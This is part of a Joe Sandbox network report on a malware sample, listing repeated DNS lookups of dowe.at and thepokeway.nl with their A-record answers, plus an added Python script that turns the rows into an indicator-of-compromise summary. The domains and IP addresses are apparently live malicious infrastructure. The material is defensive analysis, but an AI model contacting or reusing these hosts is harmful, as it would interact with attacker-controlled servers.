Nov 30, 2022 00:11:01.073633909 CET | 192.168.2.6 | 8.8.8.8 | 0xec19 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:03.599140882 CET | 192.168.2.6 | 8.8.8.8 | 0x2110 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:04.708935022 CET | 192.168.2.6 | 8.8.8.8 | 0x4552 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:20.956633091 CET | 192.168.2.6 | 8.8.8.8 | 0xf6bf | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:22.561232090 CET | 192.168.2.6 | 8.8.8.8 | 0x12a6 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:23.650019884 CET | 192.168.2.6 | 8.8.8.8 | 0xec6c | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:25.679337978 CET | 192.168.2.6 | 8.8.8.8 | 0xc21b | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:27.249752998 CET | 192.168.2.6 | 8.8.8.8 | 0xe317 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:29.865735054 CET | 192.168.2.6 | 8.8.8.8 | 0xf2fc | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:34.537358999 CET | 192.168.2.6 | 8.8.8.8 | 0xbebb | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:35.817455053 CET | 192.168.2.6 | 8.8.8.8 | 0xfe43 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:37.053144932 CET | 192.168.2.6 | 8.8.8.8 | 0x1daf | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:38.141012907 CET | 192.168.2.6 | 8.8.8.8 | 0x2ef3 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:39.139863968 CET | 192.168.2.6 | 8.8.8.8 | 0x266e | Standard query (0) | thepokeway.nl | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:40.692821026 CET | 192.168.2.6 | 8.8.8.8 | 0x46f | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:41.800481081 CET | 192.168.2.6 | 8.8.8.8 | 0x8504 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:42.937369108 CET | 192.168.2.6 | 8.8.8.8 | 0xb003 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:44.522392035 CET | 192.168.2.6 | 8.8.8.8 | 0xa796 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:45.507319927 CET | 192.168.2.6 | 8.8.8.8 | 0xbe7e | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:47.124767065 CET | 192.168.2.6 | 8.8.8.8 | 0xb0e8 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:48.973812103 CET | 192.168.2.6 | 8.8.8.8 | 0xacd6 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:50.177469969 CET | 192.168.2.6 | 8.8.8.8 | 0xa191 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:51.373785019 CET | 192.168.2.6 | 8.8.8.8 | 0x66cc | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:52.608006954 CET | 192.168.2.6 | 8.8.8.8 | 0xacbd | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:53.755806923 CET | 192.168.2.6 | 8.8.8.8 | 0x4a2b | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:55.344466925 CET | 192.168.2.6 | 8.8.8.8 | 0x293b | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:56.383055925 CET | 192.168.2.6 | 8.8.8.8 | 0x1e39 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:57.562014103 CET | 192.168.2.6 | 8.8.8.8 | 0x9fa9 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:59.303905010 CET | 192.168.2.6 | 8.8.8.8 | 0x8ad | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:00.410181999 CET | 192.168.2.6 | 8.8.8.8 | 0xd88a | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:01.524296045 CET | 192.168.2.6 | 8.8.8.8 | 0xcd8f | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:03.480338097 CET | 192.168.2.6 | 8.8.8.8 | 0x37f4 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:05.245548010 CET | 192.168.2.6 | 8.8.8.8 | 0xc889 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:07.934282064 CET | 192.168.2.6 | 8.8.8.8 | 0x9ea3 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
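The TCP, UDP and DNS tables of the report are the raw record; what an analyst wants from them is a short list of indicators and the caveats that go with it. The following is an added Python example, not part of the Joe Sandbox report, that takes rows copied from those tables (a subset of the TCP packets, DNS queries and the first DNS answer, embedded inline as pipe-delimited text) and derives three things: the A records returned for each queried name, the interval between the sample's repeated lookups of the same name, and which of the servers it connected to on TCP/80 are explained by a captured answer. The "unresolved" bucket is the caveat: a server contacted without a matching answer in the excerpt (123.253.32.170 here) may come from a resolution outside the excerpt, from an address carried in the payload, or from a later part of the table, so it is a lead to check against the full report, not a finding. The client address 192.168.2.6 is the sandbox VM from the tables; the row layout and function names are this example's own.

```python
"""Turn rows copied from a Joe Sandbox network report into an IOC summary."""
from collections import Counter, defaultdict
from datetime import datetime

# Rows copied from the report's tables, delimited with " | " for parsing (a subset).
TCP_ROWS = """\
Nov 30, 2022 00:10:58.035403967 CET | 49719 | 80 | 192.168.2.6 | 200.46.66.71
Nov 30, 2022 00:10:58.229374886 CET | 80 | 49719 | 200.46.66.71 | 192.168.2.6
Nov 30, 2022 00:10:59.588172913 CET | 49721 | 80 | 192.168.2.6 | 211.59.14.90
Nov 30, 2022 00:10:59.871526003 CET | 80 | 49721 | 211.59.14.90 | 192.168.2.6
Nov 30, 2022 00:11:06.239725113 CET | 49725 | 80 | 192.168.2.6 | 123.253.32.170
Nov 30, 2022 00:11:06.509285927 CET | 80 | 49725 | 123.253.32.170 | 192.168.2.6
Nov 30, 2022 00:11:06.779181957 CET | 80 | 49725 | 123.253.32.170 | 192.168.2.6
Nov 30, 2022 00:11:06.779318094 CET | 80 | 49725 | 123.253.32.170 | 192.168.2.6
"""

DNS_QUERY_ROWS = """\
Nov 30, 2022 00:10:57.539028883 CET | 192.168.2.6 | 8.8.8.8 | 0x8dc7 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:59.104090929 CET | 192.168.2.6 | 8.8.8.8 | 0x7cfc | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:01.073633909 CET | 192.168.2.6 | 8.8.8.8 | 0xec19 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:03.599140882 CET | 192.168.2.6 | 8.8.8.8 | 0x2110 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:39.139863968 CET | 192.168.2.6 | 8.8.8.8 | 0x266e | Standard query (0) | thepokeway.nl | A (IP address) | IN (0x0001) | false
"""

# The ten A records of transaction 0x8dc7; the empty field is the CName column.
DNS_ANSWER_ROWS = """\
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 200.46.66.71 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 123.213.233.194 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 109.102.255.230 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 201.124.230.1 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 211.171.233.129 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 37.34.248.24 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 37.234.251.221 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 211.59.14.90 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 187.212.179.75 | A (IP address) | IN (0x0001) | false
"""

SANDBOX_CLIENT = "192.168.2.6"  # the analysis VM, as seen in the report's tables


def parse_ts(text):
    """Parse 'Nov 30, 2022 00:10:58.035403967 CET'; %f accepts at most six fractional digits."""
    date_time, _tz = text.rsplit(" ", 1)
    main, frac = date_time.split(".")
    return datetime.strptime(f"{main}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def split_rows(table):
    """Split a pipe-delimited table into lists of stripped fields, skipping blank lines."""
    return [[f.strip() for f in line.split("|")] for line in table.splitlines() if line.strip()]


def a_records(answer_table):
    """Map each answered name to the set of A-record addresses returned for it."""
    records = defaultdict(set)
    for _ts, _src, _dst, _tid, rcode, name, _cname, addr, rtype, *_ in split_rows(answer_table):
        if rcode.startswith("No error") and rtype.startswith("A ("):
            records[name].add(addr)
    return dict(records)


def query_gaps(query_table, name):
    """Seconds between consecutive queries for `name`: the sample's re-resolution cadence."""
    times = sorted(parse_ts(r[0]) for r in split_rows(query_table) if r[5] == name)
    return [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]


def contacted_servers(tcp_table, client=SANDBOX_CLIENT):
    """Per server IP: (packets sent by the client, packets received by the client)."""
    sent, received = Counter(), Counter()
    for _ts, _sport, _dport, src, dst in split_rows(tcp_table):
        if src == client:
            sent[dst] += 1
        elif dst == client:
            received[src] += 1
    return {ip: (sent[ip], received[ip]) for ip in set(sent) | set(received)}


def classify_contacts(tcp_table, answer_table):
    """Split contacted servers into those explained by a captured A record and those that are not."""
    resolved = {addr for addrs in a_records(answer_table).values() for addr in addrs}
    contacted = set(contacted_servers(tcp_table))
    return {"resolved": sorted(contacted & resolved), "unresolved": sorted(contacted - resolved)}


if __name__ == "__main__":
    for name, addrs in a_records(DNS_ANSWER_ROWS).items():
        print(f"{name}: {len(addrs)} A records: {', '.join(sorted(addrs))}")
    print("dowe.at re-query gaps (s):", [round(g, 3) for g in query_gaps(DNS_QUERY_ROWS, "dowe.at")])
    for ip, (sent, received) in sorted(contacted_servers(TCP_ROWS).items()):
        print(f"{ip}: {sent} sent / {received} received")
    print(classify_contacts(TCP_ROWS, DNS_ANSWER_ROWS))
```

Run against the full tables, the received-packet count per server is the quickest way to spot which connection carried a payload back, and the answer set of a single transaction is the IOC list to block rather than the one address the sample happened to pick first.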
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 200.46.66.71 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 123.213.233.194 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 109.102.255.230 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 201.124.230.1 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 211.171.233.129 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 37.34.248.24 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 37.234.251.221 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 211.59.14.90 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:58.022703886 CET | 8.8.8.8 | 192.168.2.6 | 0x8dc7 | No error (0) | dowe.at | | 187.212.179.75 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:59.585829020 CET | 8.8.8.8 | 192.168.2.6 | 0x7cfc | No error (0) | dowe.at | | 211.59.14.90 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:59.585829020 CET | 8.8.8.8 | 192.168.2.6 | 0x7cfc | No error (0) | dowe.at | | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:59.585829020 CET | 8.8.8.8 | 192.168.2.6 | 0x7cfc | No error (0) | dowe.at | | 187.212.179.75 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:59.585829020 CET | 8.8.8.8 | 192.168.2.6 | 0x7cfc | No error (0) | dowe.at | | 200.46.66.71 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:59.585829020 CET | 8.8.8.8 | 192.168.2.6 | 0x7cfc | No error (0) | dowe.at | | 123.213.233.194 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:59.585829020 CET | 8.8.8.8 | 192.168.2.6 | 0x7cfc | No error (0) | dowe.at | | 109.102.255.230 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:59.585829020 CET | 8.8.8.8 | 192.168.2.6 | 0x7cfc | No error (0) | dowe.at | | 201.124.230.1 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:59.585829020 CET | 8.8.8.8 | 192.168.2.6 | 0x7cfc | No error (0) | dowe.at | | 211.171.233.129 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:59.585829020 CET | 8.8.8.8 | 192.168.2.6 | 0x7cfc | No error (0) | dowe.at | | 37.34.248.24 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:59.585829020 CET | 8.8.8.8 | 192.168.2.6 | 0x7cfc | No error (0) | dowe.at | | 37.234.251.221 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:01.562983036 CET | 8.8.8.8 | 192.168.2.6 | 0xec19 | No error (0) | dowe.at | | 200.46.66.71 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:01.562983036 CET | 8.8.8.8 | 192.168.2.6 | 0xec19 | No error (0) | dowe.at | | 123.213.233.194 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:01.562983036 CET | 8.8.8.8 | 192.168.2.6 | 0xec19 | No error (0) | dowe.at | | 109.102.255.230 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:01.562983036 CET | 8.8.8.8 | 192.168.2.6 | 0xec19 | No error (0) | dowe.at | | 201.124.230.1 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:01.562983036 CET | 8.8.8.8 | 192.168.2.6 | 0xec19 | No error (0) | dowe.at | | 211.171.233.129 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:01.562983036 CET | 8.8.8.8 | 192.168.2.6 | 0xec19 | No error (0) | dowe.at | | 37.34.248.24 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:01.562983036 CET | 8.8.8.8 | 192.168.2.6 | 0xec19 | No error (0) | dowe.at | | 37.234.251.221 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:01.562983036 CET | 8.8.8.8 | 192.168.2.6 | 0xec19 | No error (0) | dowe.at | | 211.59.14.90 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:01.562983036 CET | 8.8.8.8 | 192.168.2.6 | 0xec19 | No error (0) | dowe.at | | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:01.562983036 CET | 8.8.8.8 | 192.168.2.6 | 0xec19 | No error (0) | dowe.at | | 187.212.179.75 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:03.619827986 CET | 8.8.8.8 | 192.168.2.6 | 0x2110 | No error (0) | dowe.at | | 200.46.66.71 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:03.619827986 CET | 8.8.8.8 | 192.168.2.6 | 0x2110 | No error (0) | dowe.at | | 123.213.233.194 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:03.619827986 CET | 8.8.8.8 | 192.168.2.6 | 0x2110 | No error (0) | dowe.at | | 109.102.255.230 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:03.619827986 CET | 8.8.8.8 | 192.168.2.6 | 0x2110 | No error (0) | dowe.at | | 201.124.230.1 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:03.619827986 CET | 8.8.8.8 | 192.168.2.6 | 0x2110 | No error (0) | dowe.at | | 211.171.233.129 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:03.619827986 CET | 8.8.8.8 | 192.168.2.6 | 0x2110 | No error (0) | dowe.at | | 37.34.248.24 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:03.619827986 CET | 8.8.8.8 | 192.168.2.6 | 0x2110 | No error (0) | dowe.at | | 37.234.251.221 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:03.619827986 CET | 8.8.8.8 | 192.168.2.6 | 0x2110 | No error (0) | dowe.at | | 211.59.14.90 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:03.619827986 CET | 8.8.8.8 | 192.168.2.6 | 0x2110 | No error (0) | dowe.at | | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:03.619827986 CET | 8.8.8.8 | 192.168.2.6 | 0x2110 | No error (0) | dowe.at | | 187.212.179.75 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:04.729224920 CET | 8.8.8.8 | 192.168.2.6 | 0x4552 | No error (0) | dowe.at | | 211.59.14.90 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:04.729224920 CET | 8.8.8.8 | 192.168.2.6 | 0x4552 | No error (0) | dowe.at | | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:04.729224920 CET | 8.8.8.8 | 192.168.2.6 | 0x4552 | No error (0) | dowe.at | | 187.212.179.75 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:04.729224920 CET | 8.8.8.8 | 192.168.2.6 | 0x4552 | No error (0) | dowe.at | | 200.46.66.71 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:04.729224920 CET | 8.8.8.8 | 192.168.2.6 | 0x4552 | No error (0) | dowe.at | | 123.213.233.194 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:04.729224920 CET | 8.8.8.8 | 192.168.2.6 | 0x4552 | No error (0) | dowe.at | | 109.102.255.230 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:04.729224920 CET | 8.8.8.8 | 192.168.2.6 | 0x4552 | No error (0) | dowe.at | | 201.124.230.1 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:04.729224920 CET | 8.8.8.8 | 192.168.2.6 | 0x4552 | No error (0) | dowe.at | | 211.171.233.129 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:04.729224920 CET | 8.8.8.8 | 192.168.2.6 | 0x4552 | No error (0) | dowe.at | | 37.34.248.24 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:04.729224920 CET | 8.8.8.8 | 192.168.2.6 | 0x4552 | No error (0) | dowe.at | | 37.234.251.221 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:20.978972912 CET | 8.8.8.8 | 192.168.2.6 | 0xf6bf | No error (0) | dowe.at | | 211.59.14.90 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:20.978972912 CET | 8.8.8.8 | 192.168.2.6 | 0xf6bf | No error (0) | dowe.at | | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:20.978972912 CET | 8.8.8.8 | 192.168.2.6 | 0xf6bf | No error (0) | dowe.at | | 187.212.179.75 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:20.978972912 CET | 8.8.8.8 | 192.168.2.6 | 0xf6bf | No error (0) | dowe.at | | 200.46.66.71 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:20.978972912 CET | 8.8.8.8 | 192.168.2.6 | 0xf6bf | No error (0) | dowe.at | | 123.213.233.194 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:20.978972912 CET | 8.8.8.8 | 192.168.2.6 | 0xf6bf | No error (0) | dowe.at | | 109.102.255.230 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:20.978972912 CET | 8.8.8.8 | 192.168.2.6 | 0xf6bf | No error (0) | dowe.at | | 201.124.230.1 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:20.978972912 CET | 8.8.8.8 | 192.168.2.6 | 0xf6bf | No error (0) | dowe.at | | 211.171.233.129 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:20.978972912 CET | 8.8.8.8 | 192.168.2.6 | 0xf6bf | No error (0) | dowe.at | | 37.34.248.24 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:20.978972912 CET | 8.8.8.8 | 192.168.2.6 | 0xf6bf | No error (0) | dowe.at | | 37.234.251.221 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:22.578528881 CET | 8.8.8.8 | 192.168.2.6 | 0x12a6 | No error (0) | dowe.at | | 200.46.66.71 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:22.578528881 CET | 8.8.8.8 | 192.168.2.6 | 0x12a6 | No error (0) | dowe.at | | 123.213.233.194 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:22.578528881 CET | 8.8.8.8 | 192.168.2.6 | 0x12a6 | No error (0) | dowe.at | | 109.102.255.230 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:22.578528881 CET | 8.8.8.8 | 192.168.2.6 | 0x12a6 | No error (0) | dowe.at | | 201.124.230.1 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:22.578528881 CET | 8.8.8.8 | 192.168.2.6 | 0x12a6 | No error (0) | dowe.at | | 211.171.233.129 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:22.578528881 CET | 8.8.8.8 | 192.168.2.6 | 0x12a6 | No error (0) | dowe.at | | 37.34.248.24 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:22.578528881 CET | 8.8.8.8 | 192.168.2.6 | 0x12a6 | No error (0) | dowe.at | | 37.234.251.221 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:22.578528881 CET | 8.8.8.8 | 192.168.2.6 | 0x12a6 | No error (0) | dowe.at | | 211.59.14.90 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:22.578528881 CET | 8.8.8.8 | 192.168.2.6 | 0x12a6 | No error (0) | dowe.at | | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:22.578528881 CET | 8.8.8.8 | 192.168.2.6 | 0x12a6 | No error (0) | dowe.at | | 187.212.179.75 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:24.170435905 CET | 8.8.8.8 | 192.168.2.6 | 0xec6c | No error (0) | dowe.at | | 211.59.14.90 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:24.170435905 CET | 8.8.8.8 | 192.168.2.6 | 0xec6c | No error (0) | dowe.at | | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:24.170435905 CET | 8.8.8.8 | 192.168.2.6 | 0xec6c | No error (0) | dowe.at | | 187.212.179.75 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:24.170435905 CET | 8.8.8.8 | 192.168.2.6 | 0xec6c | No error (0) | dowe.at | | 200.46.66.71 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:24.170435905 CET | 8.8.8.8 | 192.168.2.6 | 0xec6c | No error (0) | dowe.at | | 123.213.233.194 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:24.170435905 CET | 8.8.8.8 | 192.168.2.6 | 0xec6c | No error (0) | dowe.at | | 109.102.255.230 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:24.170435905 CET | 8.8.8.8 | 192.168.2.6 | 0xec6c | No error (0) | dowe.at | | 201.124.230.1 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:24.170435905 CET | 8.8.8.8 | 192.168.2.6 | 0xec6c | No error (0) | dowe.at | | 211.171.233.129 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:24.170435905 CET | 8.8.8.8 | 192.168.2.6 | 0xec6c | No error (0) | dowe.at | | 37.34.248.24 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:24.170435905 CET | 8.8.8.8 | 192.168.2.6 | 0xec6c | No error (0) | dowe.at | | 37.234.251.221 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:25.698915958 CET | 8.8.8.8 | 192.168.2.6 | 0xc21b | No error (0) | dowe.at | | 211.59.14.90 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:25.698915958 CET | 8.8.8.8 | 192.168.2.6 | 0xc21b | No error (0) | dowe.at | | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:25.698915958 CET | 8.8.8.8 | 192.168.2.6 | 0xc21b | No error (0) | dowe.at | | 187.212.179.75 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:25.698915958 CET | 8.8.8.8 | 192.168.2.6 | 0xc21b | No error (0) | dowe.at | | 200.46.66.71 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:25.698915958 CET | 8.8.8.8 | 192.168.2.6 | 0xc21b | No error (0) | dowe.at | | 123.213.233.194 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:25.698915958 CET | 8.8.8.8 | 192.168.2.6 | 0xc21b | No error (0) | dowe.at | | 109.102.255.230 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:25.698915958 CET | 8.8.8.8 | 192.168.2.6 | 0xc21b | No error (0) | dowe.at | | 201.124.230.1 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:25.698915958 CET | 8.8.8.8 | 192.168.2.6 | 0xc21b | No error (0) | dowe.at | | 211.171.233.129 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:25.698915958 CET | 8.8.8.8 | 192.168.2.6 | 0xc21b | No error (0) | dowe.at | | 37.34.248.24 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:25.698915958 CET | 8.8.8.8 | 192.168.2.6 | 0xc21b | No error (0) | dowe.at | | 37.234.251.221 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:27.268702984 CET | 8.8.8.8 | 192.168.2.6 | 0xe317 | No error (0) | dowe.at | | 211.59.14.90 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:27.268702984 CET | 8.8.8.8 | 192.168.2.6 | 0xe317 | No error (0) | dowe.at | | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:27.268702984 CET | 8.8.8.8 | 192.168.2.6 | 0xe317 | No error (0) | dowe.at | | 187.212.179.75 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:27.268702984 CET | 8.8.8.8 | 192.168.2.6 | 0xe317 | No error (0) | dowe.at | | 200.46.66.71 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:11:27.268702984 CET | 8.8.8.8 | 192.168.2.6 | 0xe317 | No error (0) | dowe.at | | 123.213.233.194 | A (IP address) | IN (0x0001) | false
